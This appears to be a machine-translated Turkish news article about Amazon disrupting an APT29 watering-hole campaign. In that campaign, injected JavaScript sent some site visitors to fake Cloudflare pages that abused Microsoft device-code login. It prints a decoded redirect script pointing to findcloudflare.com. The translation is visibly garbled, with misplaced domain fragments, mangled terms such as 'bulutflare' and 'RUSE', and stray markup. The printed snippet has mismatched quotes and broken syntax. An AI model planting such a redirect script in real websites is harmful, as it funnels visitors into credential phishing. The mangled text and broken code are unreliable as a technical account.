Amazon’un tehdit istihbarat ekibi, Ağustos 2025’in sonlarında, Rus Dış İstihbarat Servisi’ne bağlı bir aktör olan Midnight Blizzard olarak da bilinen APT29 tarafından düzenlenen sofistike bir sulama deliği kampanyası ortaya çıkardı.
Operasyon, şüphesiz ziyaretçileri kötü niyetli altyapıya yönlendirmek için meşru web sitelerinin uzlaşmasına dayanıyordu.
Yeniden yönlendirildikten sonra, kullanıcılar kimlik bilgilerini toplamak ve kurbanları Microsoft’un cihaz kodu kimlik doğrulama akışı aracılığıyla saldırgan kontrollü cihazlara yetkilendirmeye yönlendirmek için tasarlanmış sahte bulutflare doğrulama sayfalarıyla karşılaştılar.
Kampanyanın genişliği çarpıcıydı: Site ziyaretçilerinin yaklaşık yüzde 10’u FindCloudflare gibi aktör kontrollü alanlara sifonlandı[.]com ve cloudflare.rediirectPartners[.]com.
Bu alan adları, resmi güvenlik kontrollerini o kadar ikna edici bir şekilde taklit etti ki, birçok kullanıcı RUSE’yi tespit edemedi.
.webp)
Amazon analistleri, bu yaklaşımın APT29’un Tradecraft’ında önemli bir evrim olduğunu belirtti. Grup, yalnızca kimlik avı e-postalarına veya hedefli mızrak akışçılığına güvenmek yerine, tehlikeli JavaScript’in fırsatçı enjeksiyonu tehlikeye atılmış alanlara kullandı.
Bu taktik, kötü niyetli yönlendirmeleri doğrudan popüler web sayfalarına yerleştirerek potansiyel kurban havuzlarını genişletti.
Ziyaretçiler genellikle cihaz kodlarına girmeleri veya yeni cihaz yetkilerini onaylamaları istenene kadar yeniden yönlendirildiklerini fark etmiyorlardı – tehdit oyuncusuna kalıcı erişim sağlayan eylemler.
Bu kampanyanın etkisi sadece kimlik belgesi hırsızlığının ötesine geçti. Microsoft’un cihaz kodu kimlik doğrulaması ile entegre olarak, APT29 kurumsal ortamlarda devam ederek yanal olarak hareket etmek ve istihbarat toplamak için yetkili oturumlardan yararlanabilir.
Hiçbir AWS sistemi tehlikeye atılmasa da, olay, devlet destekli aktörlerin yöntemlerini geleneksel savunmalardan kaçınmak için uyarlayan kalıcı tehdidin altını çizdi.
Amazon, kötü niyetli alanları sökmek ve tehlikeye atılan EC2 örneklerini izole etmek için Cloudflare, Microsoft ve diğer sağlayıcılarla hızlı bir şekilde çalıştı ve koordineli endüstri yanıtının gücünü gösterdi.
Gizli JavaScript’e teknik genel bakış
Enjekte edilen komut dosyasına daha yakından bakmak, birkaç gelişmiş kaçırma tekniği ortaya çıkar. JavaScript yükü, gerçek amacını maskelemek için baz64 kodlanmıştır ve randomizasyon mantığı yalnızca bir ziyaretçi alt kümesini yeniden yönlendirerek tespit olasılığını azaltır.
Kod çözüldükten sonra, snippet, aynı kullanıcının tekrarlanan yönlendirmelerini önlemek için çerezleri ayarlarken hileli kimlik doğrulama sayfasına sunucu tarafı bir yönlendirme gerçekleştirdi. Kod çözülmüş kodun basitleştirilmiş bir sürümü aşağıda görünür:-
(function(){
var uid = Math.random().toString(36).substring(2);
if (!document.cookie.includes('redir="+uid) && Math.random()<0.1) {
document. Cookie = "redir="+uid+";path=/';
window.location.replace('https://findcloudflare.com/device/code?auth=' + uid);
}
})();Bu snippet, APT29'un önceki altyapı bozulduğunda istemci tarafından sunucu tarafına kaymasını örneklendirir.
Grup, hızla yeni alanlara geçip kodlarını geliştirerek, devam eden yayından kaldırmalara rağmen kampanyalarını sürdürdü.
Amazon'un bu altyapının başarılı bir şekilde bozulması, web tabanlı tehditlerin sürekli izlenmesi ve güvenlik topluluğu genelinde işbirliği gerekliliğini vurgulamaktadır.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Amazon Post, Rusya APT 29 Altyapı Saldırı için kullanılan 29 altyapısını, ilk olarak siber güvenlik haberlerinde ortaya çıktı.